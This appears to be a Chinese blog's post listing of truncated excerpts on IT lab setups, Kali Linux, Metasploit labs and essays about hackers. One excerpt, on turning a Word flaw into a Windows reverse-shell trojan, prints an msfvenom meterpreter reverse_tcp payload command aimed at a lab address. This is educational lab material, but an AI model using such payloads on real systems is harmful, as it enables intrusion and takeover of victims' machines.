- 博客(38)
- 收藏
- 关注
RSS订阅原创 Curl命令返回状态码
https://www.cnblogs.com/xingxia/p/linux_curl.html(这篇文章内容写的很棒)Curl命令返回状态码原因和说明请看下面列表。本篇文章内容来自网络。
2023-04-07 10:59:15
3499
原创 解决火狐浏览器的(此网址已被限制,此网址使用了一个通常用于网络浏览以外目的的端口,出于安全原因,Firefox 取消了该请求)问题
今天新安排了一个靶场,结果遇到这个解决方案:1,在火狐浏览器中输入about:config2,在搜索首选项中输入network.security.ports.banned.override其中,设置开放端口可以使用,来分隔多个端口;使用-表示一个开放端口范围。3,测试完成...
2021-09-14 13:58:34
6496
1
原创 安装Python教程
实验环境:一台Windows操作系统的计算机实验目的:安装Python实验步骤:一,安装Python程序二,加入Windows的环境变量三,打开Visual Studio Code安装Python环境四,运行测试【至此,安装完成】
2021-05-10 16:54:26
131
原创 利用word漏洞制作Windows反弹木马
实验环境:Windows虚拟机一台IP地址为192.168.230.4,需安装office,kali Linux虚拟机一台,IP地址192.168.230.10实验目的:拿下Windows控制权实验步骤:一,部署实验环境1,Windows安装word,配置IP地址二,使用kali生成payload1,打开msf生成payload命令行输入msfconsole也可以打开msf6 > msfvenom -p windows/meterpreter/reverse_tcp LHOST=19
2021-05-07 13:34:29
1346
原创 安装部署御点
实验环境:一台域控制器,两台域成员实验要求:安装部署腾讯御点实验步骤:1,域控进行安装安装管理端2,W1安装域控客户端(W2同)3,部署监控客户端还有其他功能可以尝试,如终端硬件更改监控,远程协助,软件库等【至此,安装使用御点实验完成】...
2021-03-17 22:05:41
3790
原创 OWASP TOP 10 2019
1,A1:2017-注入将不受信任的数据作为命令或查询的一部分发送到解析器时,会产生诸如SQL注入、NoSQL注入、OS注入和LDAP注入的注入缺陷。攻击者的恶意数据可以诱使解析器在没有适当授权的情况下执行非预期命令或访问数据。2,A2:2017-失效的身份认证通常,通过错误使用应用程序的身份认证和会话管理功能,攻击者能够破译密码、密钥或会话令牌,或者利用其它开发缺陷来暂时性或永久性冒充其他用户的身份。3,A3:2017-敏感数据泄露许多Web应用程序和API都无法正确保护敏感数据,例如:财务数据
2021-03-10 21:18:52
791
原创 病毒,木马,蠕虫三者的区别:
病毒,木马,蠕虫统称为电脑病毒。病毒(包含蠕虫)的共同特征是自我复制、传播、破坏电脑文件,对电脑造成数据上不可逆转的损坏。而木马独有特征是伪装成正常应用骗取用户信任而入侵,潜伏在电脑中盗取用户资料与信息。病毒:是编制者在计算机程序中插入的破坏计算机功能或者数据的代码,能影响计算机使用,能自我复制的一组计算机指令或者程序代码。木马:也称木马病毒,是指通过特定的程序来控制另一台计算机。与一般的病毒不同,它不会自我繁殖,也并不“刻意”地去感染其他文件,它通过将自身伪装吸引用户下载执行,向施种木马者提供打开
2021-03-04 15:06:30
4061
1
原创 计算机病毒的六大特征:
计算机病毒的六大特征是:1、繁殖性:计算机病毒可以像生物病毒一样进行繁殖,当正常程序运行时,它也进行运行自身复制,是否具有繁殖、感染的特征是判断某段程序为计算机病毒的首要条件。2、破坏性:计算机中毒后,可能会导致正常的程序无法运行,把计算机内的文件删除或受到不同程度的损坏。破坏引导扇区及BIOS,硬件环境破坏。3、传染性:计算机病毒传染性是指计算机病毒通过修改别的程序将自身的复制品或其变体传染到其它无毒的对象上,这些对象可以是一个程序也可以是系统中的某一个部件。4、潜伏性:计算机病毒潜伏性是指计算机
2021-03-04 14:51:55
10107
1
原创 关闭烦人的Windows自动更新
本实验的原因:Windows7反盗版检测补丁KB971033已正式发布。 这款更新补丁其实根本不是补丁,而是Windows Activation Technologies,它进入系统后会评估用户的系统是否为正版产品,若不是,则会与之前微软预告的那样在系统中做一些手脚,让用户在激活前无法使用。所以,打补丁的时候记得不要下载此补丁,或者干脆关闭windows update。1,右键此电脑,点击管理2,点击服务和程序3,点击服务4,找到Windows update,右键属性5,找到常规,停止服务
2021-02-23 13:13:28
211
原创 安装Linux kali 2020(白帽工具)
实验环境:Windows操作系统,VMware Workstation Pro实验目的:安装kali实验步骤:1,新建虚拟机2,开始安装选择图形化安装设置语言为简体中文等待【至此,kali安装完成】
2021-02-18 18:45:35
198
原创 使用kali对安卓手机进行渗透测试
实验环境:Kali虚拟机一台,4G运行,IP地址192.168.0.105;安卓手机一部,建议使用不用的破手机实验目的:对安卓机进行攻击测试实验步骤:(一),配置卡里环境1,kali配置网络┌──(root????kali)-[~]└─#ifconfig 查看kali本机IP地址 eth0: flags=4
2021-02-12 14:12:42
20808
27
原创 渗透测试实例:Metasploitable3靶机
实验环境:Kali虚拟机一台、4G运行,Metasploitable3靶机一台,IP地址192.168.22.20实验目的:对Metasploitable3靶机进行渗透测试实验步骤:(一),对靶机进行扫描1,使用Neuss对靶机进行扫描
2021-02-09 18:20:23
4073
原创 使用kali进行渗透测试--攻击实例:Windows 2008
实验环境:Kali虚拟机一台、4G运行,Windows 2008靶机一台,IP地址192.168.22.138实验目的:使用kali对Windows 2008进行渗透测试实验步骤:(一),对靶机进行扫描1,使用Neuss进行扫描2,开启metasploit框架进行扫描msf6 > db_nmap -A -T4 192.168.22.138 使用nmap进行扫描(二),进行渗透测试扫描smb版本信息msf6 > search s
2021-02-04 21:06:18
5195
1
原创 渗透测试实例--Metasploitable2靶机
实验环境:Kali Linux虚拟机一台,4G运行,Metasploitable2靶机一台实验目的:实验步骤:
2021-02-01 23:21:45
4201
1
原创 从5大头号黑客的“黑转白”历史,悟出的一套黑客修炼之道
素材来源于网络,自己学习用,一起分享原:https://www.sohu.com/a/407507503_99960938黑客是一群精通网络安全、极具创造力的高智商人群。有些黑客或为了证明自己的技术,或者纯粹出于乐趣,都曾突破计算机软件和网络系统给企业或者政府制造过麻烦,当然,他们也因此声名鹊起。盘点一下黑转白的五大著名黑客1,凯文·米特尼克(Kevin Mitnick)米特尼克已经成为有史以来最为著名的道德黑客之一,美国司法部称他为“美国历史上通缉的计算机罪犯”。1995年,由于进行了两年半的
2021-01-31 16:39:18
317
1
原创 世界十大著名黑客
素材来源于网络,自己学习用,一起分享原:http://www.360doc.com/content/17/1122/18/47391821_706209973.shtml我们知道,并非所有的黑客都是坏的。 也有好的黑客,圈内称为“白帽黑客”,他们使用黑客技术来提高计算机网络的安全性。 另外一些介于上述两类之间的、亦正亦邪的黑客,被称为“灰帽黑客”。正如历史所记载,他们曾可能对社会造成很大的伤害,被人称为最臭名昭着的“黑帽子”。下面来一一揭晓他们曾做过的最疯狂的事,以及现如今他们又在哪里?在做什么呢?
2021-01-31 15:41:34
3194
10
原创 你是废物吗
素材来源于网络,自己学习用,一起分享原:http://www.360doc.com/content/19/1219/14/54657784_880772108.shtml2019不堪入目一览:这是你的一年,还是余生?""你工作一般每天准时上下班从不迟到,偶尔加班收入永远跟不上花听说别人丰厚的年终奖,常常不甘心想着过完年就换份工作年后却又贪恋熟悉和安逸糊里糊涂拖了一年又一年2019不堪入目一览:这是你的一年,还是余生?""你家境一般父母都是普通的员工前半生大部分积蓄都供你读书没钱
2021-01-31 15:22:36
335
6
原创 人性的恶
素材来源于网络,自己学习用,一起分享原:http://www.360doc.com/content/20/1124/06/25459550_947507990.shtml你身边有没有这样的人:当别人比自己优秀的时候,就会阴阳怪气的讽刺别人一番;当别人拿到奖金的时候,就会暗自在背地里议论人家只是运气好;当别人拿到了证书,就只会说证书有什么用,工作也用不上……没错,这世界总有一些人看到别人比自己好,就会心生妒忌,通过各种贬低,讽刺,甚至是造谣的方式,来对他人进行打压,来找到内心的平衡。《瑜伽师地论
2021-01-31 10:49:08
378
4
原创 黑客良知
从网络上寻找的关于黑客需要遵守的道德规范总结:1.不恶意破坏任何系统,恶意破坏他人的软件将导致法律刑责!2.不修改任何系统档,如果你是为了进入系统而修改它,请在达到目的后改回原状。3.不要轻易将你要入侵的网站告诉你不信任的朋友。4.不要在网络论坛上谈论黑客的任何事情。5.在传递文章的时候不要使用真名。6.正在入侵的时候,不要随意离开你的电脑。7.不要侵入或破坏政府机关的主机。8.不在电话中谈论黑客的任何事情。9.将你的笔记放在安全的地方。10.想要成为黑客就要真正地掌握黑客技术,读遍所
2021-01-31 10:25:14
421
原创 解决metasploit中无法正常连接数据库
实验环境:kali Linux虚拟机实验目的:解决metasploit连接数据库异常实验步骤:1,发现问题,metasploit未正常连接数据库┌──(root????kali)-[~]└─# msfconsole 开启metasploit框架2,尝试重新开启metasploit看是否可以解决问题msf6 > quit 退出metasploit框架
2021-01-29 16:11:11
2763
2
原创 使用Neuss扫描xampp和Metasploitable系统
实验环境:kali虚拟机,4G运行,安装Neuss实验目的:使用Neuss进行扫描xampp和Metasploitable系统实验步骤:(一),设置扫描策略(二),新建扫描任务xampp(三),扫描Metasploitable系统【至此,Neuss扫描xampp和Metasploitable系统完成】...
2021-01-26 10:38:11
482
2
原创 kali配置网络(2)
实验环境:kali虚拟机,4G运行实验目的:使用dhcp分配kali的IP地址实验步骤:1,配置虚拟机网络适配器2,配置网卡┌──(root????kali)-[~]└─# vim /etc/network/interfaces 网卡配置路径auto loiface lo inet loopback3,进行验证┌──(root????kali)-[~]└─# systemctl restart networking 重启网卡
2021-01-25 20:09:52
257
原创 kali配置网络
实验环境:kali虚拟机,4G运行实验目的:配置kali网络实验步骤:1,调整虚拟网络适配器2,配置网卡┌──(root????kali)-[~]└─# vim /etc/network/interfaces kali网卡配置路径#auto lo 动态IP分配iface lo inet loopback auto eth0 网卡名称iface eth0 inet static 表示使用静态
2021-01-25 19:33:24
3638
原创 kali浏览器设置中文
实验环境:kali虚拟机,4G运行实验目的:实现kali网络浏览器设置中文,实现web网页中文显示实验步骤:(一),kali浏览器设置中文显示(二),实现网络中文显示【至此,kali显示中文设置完成】...
2021-01-25 17:42:39
3070
原创 解决kali中无法正常复制
实验环境:kali虚拟机一台实验目的:kali和和新版的vmwave不兼容会导致的无法正常复制,所以可以使用命令来重新安装VMware tools实验步骤:1,第一步:先配置apt,以方便进行安装┌──(root????kali)-[~]└─# vim /etc/apt/sources.list#中科大deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contribdeb-src http://mirrors.ust
2021-01-23 16:49:14
4019
6
原创 搭建DVWA,MCIR,Pikaqu,mutillidae,BWAPP常用靶机
实验环境:Windows2008实验目的:搭建DVWA,MCIR,Pikaqu,mutillidae,BWAPP靶机实验步骤:1,安装XAMPP软件上传xampp低版本来方便完成漏洞复现!在这里插入图片描述2,安装DVWA末尾行添加<VirtualHost *:81>ServerAdmin sevenwin@163.comDocumentRoot “D:/xampp/htdocs/dvwa”ServerName 192.168.22.130ErrorLog “logs
2021-01-21 01:31:15
849
5
原创 yum无法正常使用
[root@localhost ~]# yum clean allLoaded plugins: fastestmirror, langpacksExisting lock /var/run/yum.pid: another copy is running as pid 3629.Another app is currently holding the yum lock; waiting for it to exit…The other application is: PackageKitMemo
2021-01-18 16:11:17
286
原创 搭建Oracle数据库
实验名称:搭建Oracle数据库实验要求:完成搭建Oracle数据库实验环境:Centos7虚拟机一台,IP地址192.168.22.100,4G运行,交换分区需要是物理内存的1.5–2倍,磁盘空间不少于10G,Oracle安装就需要5G实验步骤:(一),配置实验环境1,先查看条件是否满足2,配置实验所需域名[root@localhost ~]# vim /etc/hostname 设置主机名(需要遵循FQDN且不可随意更改)odb.sevenwin
2021-01-17 17:01:58
1070
原创 搭建MySQL主从复制
实验名称:搭建MySQL主从复制服务器实验要求:搭建MySQL服务器,并完成主从复制实验环境:centos7主服务器一台,IP地址192.168.22.100;centos7从服务器1,IP地址192.168.22.110;centos7从服务器2,IP地址192.168.22.120实验步骤...
2021-01-17 16:28:41
163
原创 搭建ELK日志服务器
实验名称:搭建ELK日志分析服务器实验要求:搭建ELK日志分析系统并进行验证实验环境:一台centos7操作系统虚拟机,CUP核心数2,4G运行内存,作为ELK主服务器;一台cnetos7操作系统虚拟机,CUP核心数2,4G运行内存,作为ELK从服务器,实现热备;一台centos7操作系统虚拟机,无硬性配置要求,作为客户端来进行验证实验步骤:1,准备实验环境[root@localhost ~]# vim /etc/hostname #更改主机名称elk1.server.org
2020-12-14 16:10:17
1382
1
原创 PXE网络装机
实验名称:PXE网络装机实验实验要求:搭建PXE服务,对裸机进行自动化安装centos7操作系统实验环境:centos7虚拟机一台,搭建pxe进行网络装机;一台裸机,用于验证实验步骤:1),准备环境配置网络源yum[root@localhost ~]# cd /etc/yum.repos.d/[root@localhost yum.repos.d]# lsCentOS-Base.repo CentOS-Debuginfo.repo CentOS-Media.repo CentOS-
2020-12-08 08:31:56
2416
13
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人